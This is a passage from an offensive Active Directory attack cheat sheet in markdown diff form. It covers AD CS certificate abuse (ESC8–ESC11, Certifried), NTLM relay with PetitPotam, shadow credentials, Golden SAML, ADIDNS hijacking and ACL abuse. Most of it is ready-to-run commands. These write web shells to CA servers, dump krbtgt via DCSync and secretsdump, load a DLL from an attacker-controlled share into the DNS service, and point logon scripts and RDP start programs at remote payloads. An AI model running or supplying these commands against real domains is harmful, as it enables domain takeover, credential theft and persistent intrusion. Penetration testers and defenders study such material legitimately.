/altname:super.adm + ``` +* Grant approval if required or disable the approval requirement + ```ps1 + # Grant + Certify.exe issue /id:[REQUEST ID] + # Disable + Certify.exe setconfig /removeapproval /restart + ``` + +Alternative exploitation from **ManageCA** to **RCE** on ADCS server: + +```ps1 +# Get the current CDP list. Useful to find remote writable shares: +Certify.exe writefile /ca:SERVER\ca-name /readonly + +# Write an aspx shell to a local web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx + +# Write the default asp shell to a local web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp + +# Write a php shell to a remote web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php +``` + + +### ESC8 - AD CS Relay Attack + +> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket. + +Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101) + +* **Version 1**: NTLM Relay + Rubeus + PetitPotam + ```powershell + impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate + # For a member server or workstation, the template would be "Computer". + # Other templates: workstation, DomainController, Machine, KerberosAuthentication + + # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam + # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN + git clone https://github.com/topotam/PetitPotam + python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP + python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP + python3 dementor.py -u -p -d + python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local + + # Use the certificate with rubeus to request a TGT + Rubeus.exe asktgt /user: /certificate: /ptt + Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt + + # Now you can use the TGT to perform a DCSync + mimikatz> lsadump::dcsync /user:krbtgt + ``` + +* **Version 2**: NTLM Relay + Mimikatz + Kekeo + ```powershell + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController + + # Mimikatz + mimikatz> misc::efs /server:dc.lab.local /connect: /noauth + + # Kekeo + kekeo> base64 /input:on + kekeo> tgt::ask /pfx: /user:dc$ /domain:lab.local /ptt + + # Mimikatz + mimikatz> lsadump::dcsync /user:krbtgt + ``` + +* **Version 3**: Kerberos Relay + ```ps1 + # Setup the relay + sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine + + # Run mitm6 + sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v + ``` + +* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed. + ```powershell + https://github.com/bats3c/ADCSPwn + adcspwn.exe --adcs --port [local port] --remote [computer] + adcspwn.exe --adcs cs.pwnlab.local + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local + + # ADCSPwn arguments + adcs - This is the address of the AD CS server which authentication will be relayed to. + secure - Use HTTPS with the certificate service. + port - The port ADCSPwn will listen on. + remote - Remote machine to trigger authentication from. + username - Username for non-domain context. + password - Password for non-domain context. + dc - Domain controller to query for Certificate Templates (LDAP). + unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . + output - Output path to store base64 generated crt. + ``` + +* **Version 5**: Certipy ESC8 + ```ps1 + certipy relay -ca 172.16.19.100 + ``` + + +### ESC9 - No Security Extension + +**Requirements** + +* `StrongCertificateBindingEnforcement` set to `1` (default) or `0` +* Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value +* Certificate specifies `Any Client` authentication EKU +* `GenericWrite` over any account A to compromise any account B + +**Scenario** + +John@corp.local has **GenericWrite** over Jane@corp.local, and we want to compromise Administrator@corp.local. +Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value. + +* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite) + ```ps1 + certipy shadow auto -username John@corp.local -p Passw0rd -account Jane + ``` +* Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part + ```ps1 + certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator + ``` +* Request the vulnerable certificate template ESC9 from Jane's account. + ```ps1 + certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9 + # userPrincipalName in the certificate is Administrator + # the issued certificate contains no "object SID" + ``` +* Restore userPrincipalName of Jane to Jane@corp.local. + ```ps1 + certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local + ``` +* Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user. + ```ps1 + certipy auth -pfx administrator.pfx -domain corp.local + # Add -domain to your command line since there is no domain specified in the certificate. + ``` + +### ESC11 - Relaying NTLM to ICPR + +> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue + +Requirements: +* [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork +* [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork + +Exploitation: +1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output +2. Setup a relay using Impacket ntlmrelay and trigger a connection to it. + ```ps1 + ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support + ``` + +### Certifried CVE-2022-26923 + +> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege. + +* Find `ms-DS-MachineAccountQuota` + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 getObjectAttributes 'DC=lab,DC=local' ms-DS-MachineAccountQuota + ``` +* Add a new computer in the Active Directory, by default `MachineAccountQuota = 10` + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 addComputer cve 'CVEPassword1234*' + certipy account create 'lab.local/username:Password123*@dc.lab.local' -user 'cve' -dns 'dc.lab.local' + ``` +* [ALTERNATIVE] If you are `SYSTEM` and the `MachineAccountQuota=0`: Use a ticket for the current machine and reset its SPN + ```ps1 + Rubeus.exe tgtdeleg + export KRB5CCNAME=/tmp/ws02.ccache + python bloodyAD -d lab.local -u 'ws02$' -k --host dc.lab.local setAttribute 'CN=ws02,CN=Computers,DC=lab,DC=local' servicePrincipalName '[]' + ``` +* Set the `dNSHostName` attribute to match the Domain Controller hostname + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 setAttribute 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName '["DC.lab.local"]' + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 getObjectAttributes 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName + ``` +* Request a ticket + ```ps1 + # certipy req 'domain.local/cve$:CVEPassword1234*@ADCS_IP' -template Machine -dc-ip DC_IP -ca discovered-CA + certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA + ``` +* Either use the pfx or set a RBCD on your machine account to takeover the domain + ```ps1 + certipy auth -pfx ./dc.pfx -dc-ip 10.10.10.10 + + openssl pkcs12 -in dc.pfx -out dc.pem -nodes + python bloodyAD.py -d lab.local -c ":dc.pem" -u 'cve$' --host 10.10.10.10 setRbcd 'CVE$' 'CRASHDC$' + getST.py -spn LDAP/CRASHDC.lab.local -impersonate Administrator -dc-ip 10.10.10.10 'lab.local/cve$:CVEPassword1234*' + secretsdump.py -user-status -just-dc-ntlm -just-dc-user krbtgt 'lab.local/Administrator@dc.lab.local' -k -no-pass -dc-ip 10.10.10.10 -target-ip 10.10.10.10 + ``` + + +### Pass-The-Certificate + +> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential" + +* Windows + ```ps1 + # Information about a cert file + certutil -v -dump admin.pfx + + # From a Base64 PFX + Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show + + # Grant DCSync rights to an user + ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid + # To restore + ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt + ``` +* Linux + ```ps1 + # Base64-encoded PFX certificate (string) (password can be set) + gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + ​ + # PEM certificate (file) + PEM private key (file) + gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # PFX certificate (file) + password (string, optionnal) + gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # Using Certipy + certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain' + certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx" + ``` + + +## UnPAC The Hash + +Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate. + +* Windows + ```ps1 + # Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC. + Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show + ``` +* Linux + ```ps1 + # Obtain a TGT by validating a PKINIT pre-authentication + $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # Use the session key to recover the NT hash + $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME' + ``` + + +## Shadow Credentials + +> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match. + +:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists + +**Requirements**: +* Domain Controller on (at least) Windows Server 2016 +* Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured +* PKINIT Kerberos authentication +* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object + +**Exploitation**: +- From Windows, use [Whisker](https://github.com/eladshamir/Whisker): + ```powershell + # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. + Whisker.exe list /target:computername$ + # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. + Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" + Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] + # Removes a key credential from the target object specified by a DeviceID GUID. + Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b + ``` + +- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker): + ```bash + # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" + # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. + pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" + # Removes a key credential from the target object specified by a DeviceID GUID. + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" + ``` + +**Scenario**: + +- **Scenario 1**: Shadow Credential relaying + - Trigger an NTLM authentication from `DC01` (PetitPotam) + - Relay it to `DC02` (ntlmrelayx) + - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) + - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` + +- **Scenario 2**: Workstation Takeover with RBCD + ```ps1 + # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81 + + # Set up ntlmrelayx to relay authentication from target workstation to DC + proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81 + + # Execute printer bug to trigger authentication from target workstation + proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file + + # Get a TGT using the newly acquired certificate via PKINIT + proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR + + # Get a ST (service ticket) for the target account + proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v + + # Utilize the ST for future activity + export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache + proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab + ``` + +## Active Directory Groups + +### Dangerous Built-in Groups Usage + +If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object. + +> The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s). + +Find users with `AdminCount=1`. + +```powershell +crackmapexec ldap 10.10.10.10 -u username -p password --admin-count +# or +python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.10.10.10 +jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json +# or +Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)" +Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)" +# or +([adsisearcher]"(AdminCount=1)").findall() +``` + + +### AdminSDHolder Abuse + +> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins. + +If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by `SDProp` (in an hour). +E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group. + +```powershell +# Add a user to the AdminSDHolder group: +Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -Verbose + +# Right to reset password for toto using the account titi +Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword + +# Give all rights +Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All +``` + + +### Abusing DNS Admins Group + +> It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM). + +:warning: Require privileges to restart the DNS service. + +* Enumerate members of DNSAdmins group + ```ps1 + Get-NetGroupMember -GroupName "DNSAdmins" + Get-ADGroupMember -Identity DNSAdmins + ``` +* Change dll loaded by the DNS service + ```ps1 + # with RSAT + dnscmd /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll + dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll + + # with DNSServer module + $dnsettings = Get-DnsServerSetting -ComputerName -Verbose -All + $dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll" + Set-DnsServerSetting -InputObject $dnsettings -ComputerName -Verbose + ``` +* Check the previous command success + ```ps1 + Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll + ``` +* Restart DNS + ```ps1 + sc \\dc01 stop dns + sc \\dc01 start dns + ``` + +### Abusing Schema Admins Group + +> The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory. + + +### Abusing Backup Operators Group + +> Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers. + +This groups grants the following privileges : +- SeBackup privileges +- SeRestore privileges + +* Get members of the group: + ```ps1 + PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse + ``` +* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege) + ```ps1 + Import-Module .\SeBackupPrivilegeUtils.dll + Import-Module .\SeBackupPrivilegeCmdLets.dll + + Set-SeBackupPrivilege + Get-SeBackupPrivilege + ``` +* Retrieve sensitive files + ```ps1 + Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite + ``` +* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive + ```ps1 + $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64) + $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') + $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"} + ``` +* Retrieve SAM,SECURITY and SYSTEM hives + * [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\` + * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK` + + +## Active Directory Federation Services + +### ADFS - Golden SAML + +**Requirements**: +* ADFS service account +* The private key (PFX with the decryption password) + +**Exploitation**: +* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` +* Convert PFX and Private Key to binary format + ```ps1 + # For the pfx + echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin + # For the private key + echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin + ``` +* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). + ```ps1 + mkdir ADFSpoofTools + cd $_ + git clone https://github.com/dmb2168/cryptography.git + git clone https://github.com/mandiant/ADFSpoof.git + virtualenv3 venvADFSSpoof + source venvADFSSpoof/bin/activate + pip install lxml + pip install signxml + pip uninstall -y cryptography + cd cryptography + pip install -e . + cd ../ADFSpoof + pip install -r requirements.txt + python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls + /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' + ``` + +Other interesting tools to exploit AD FS: +* [WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) + + +## Active Directory Integrated DNS + +ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic. Active Directory will need some time (~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol. + +* Enumerate all records using [dirkjanm/adidnsdump](https://github.com/dirkjanm/adidnsdump) + ```ps1 + adidnsdump -u DOMAIN\\user --print-zones dc.domain.corp (--dns-tcp) + ``` +* Query a node using [dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx) + ```ps1 + dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query $DomainController (--legacy) + ``` +* Add a node and attach a record + ```ps1 + dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController + ``` + +The common way to abuse ADIDNS is to set a wildcard record and then passively listen to the network. + +```ps1 +Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y +``` + + +## Abusing Active Directory ACLs/ACEs + +Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). + +```powershell +ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show +``` + +### GenericAll + +* **GenericAll on User** : We can reset user's password without knowing the current password +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user hacker) to the Domain Admin group : + * On Windows : `net group "domain admins" hacker /add /domain` + * On Linux: + * using the Samba software suite : + `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'hacker%MyPassword123' -W DOMAIN -I [DC IP]` + * using bloodyAD: + `bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'` + +* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it. + ```powershell + # Check for interesting permissions on accounts: + Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} + + # Check if current user has already an SPN setted: + PowerView2 > Get-DomainUser -Identity | select serviceprincipalname + + # Force set the SPN on the account: Targeted Kerberoasting + PowerView2 > Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'} + PowerView3 > Set-DomainObject -Identity -Set @{serviceprincipalname='any/thing'} + + # Grab the ticket + PowerView2 > $User = Get-DomainUser username + PowerView2 > $User | Get-DomainSPNTicket | fl + PowerView2 > $User | Select serviceprincipalname + + # Remove the SPN + PowerView2 > Set-DomainObject -Identity username -Clear serviceprincipalname + ``` + +* **GenericAll/GenericWrite** : We can change a victim's **userAccountControl** to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back. + * On Windows: + ```powershell + # Modify the userAccountControl + PowerView2 > Get-DomainUser username | ConvertFrom-UACValue + PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose + + # Grab the ticket + PowerView2 > Get-DomainUser username | ConvertFrom-UACValue + ASREPRoast > Get-ASREPHash -Domain domain.local -UserName username + + # Set back the userAccountControl + PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose + PowerView2 > Get-DomainUser username | ConvertFrom-UACValue + ``` + * On Linux: + ```bash + # Modify the userAccountControl + $ bloodyAD.py --host [DC IP] -d [DOMAIN] -u [AttackerUser] -p [MyPassword] setUserAccountControl [Target_User] 0x400000 True + + # Grab the ticket + $ GetNPUsers.py DOMAIN/target_user -format -outputfile + + # Set back the userAccountControl + $ bloodyAD.py --host [DC IP] -d [DOMAIN] -u [AttackerUser] -p [MyPassword] setUserAccountControl [Target_User] 0x400000 False + ``` + + +### GenericWrite + +* Reset another user's password + * On Windows: + ```powershell + # https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1 + $user = 'DOMAIN\user1'; + $pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force; + $creds = New-Object System.Management.Automation.PSCredential $user, $pass; + $newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force; + Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds; + ``` + * On Linux: + ```bash + # Using rpcclient from the Samba software suite + rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" + + # Using bloodyAD with pass-the-hash + bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd + ``` + +* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` + +#### GenericWrite and Remote Connection Manager + +> Now let’s say you are in an Active Directory environment that still actively uses a Windows Server version that has RCM enabled, or that you are able to enable RCM on a compromised RDSH, what can we actually do ? Well each user object in Active Directory has a tab called ‘Environment’. +> +> This tab includes settings that, among other things, can be used to change what program is started when a user connects over the Remote Desktop Protocol (RDP) to a TS/RDSH in place of the normal graphical environment. The settings in the ‘Starting program’ field basically function like a windows shortcut, allowing you to supply either a local or remote (UNC) path to an executable which is to be started upon connecting to the remote host. During the logon process these values will be queried by the RCM process and run whatever executable is defined. - https://sensepost.com/blog/2020/ace-to-rce/ + +:warning: The RCM is only active on Terminal Servers/Remote Desktop Session Hosts. The RCM has also been disabled on recent version of Windows (>2016), it requires a registry change to re-enable. + +```powershell +$UserObject = ([ADSI]("LDAP://CN=User,OU=Users,DC=ad,DC=domain,DC=tld")) +$UserObject.TerminalServicesInitialProgram = "\\1.2.3.4\share\file.exe" +$UserObject.TerminalServicesWorkDirectory = "C:\" +$UserObject.SetInfo() +``` + +NOTE: To not alert the user the payload should hide its own process window and spawn the normal graphical environment. + +### WriteDACL + +To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'` + +* WriteDACL on Domain: + * On Windows: + ```powershell + # Give DCSync right to the principal identity + Import-Module .\PowerView.ps1 + $SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force + $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword) + Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local + ``` + * On Linux: + ```bash + # Give DCSync right to the principal identity + bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 + + # Remove right after DCSync + bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False + ``` + +* WriteDACL on Group + ```powershell + Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1 + net group "INTERESTING_GROUP" User1 /add /domain + ``` + Or + ```powershell + bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp + + # Remove right + bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False + ``` + +### WriteOwner + +An attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. This can be achieved with Set-DomainObjectOwner (PowerView module). + +```powershell +Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal' +``` +Or +```powershell +bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object +``` + +This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group. + + +### ReadLAPSPassword + +An attacker can read the LAPS password of the computer account this ACE applies to. This can be achieved with the Active Directory PowerShell module. Detail of the exploitation can be found in the [Reading LAPS Password](#reading-laps-password) section. + +```powershell +Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' +``` +Or for a given computer +```powershell +bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime +``` + + +### ReadGMSAPassword + +An attacker can 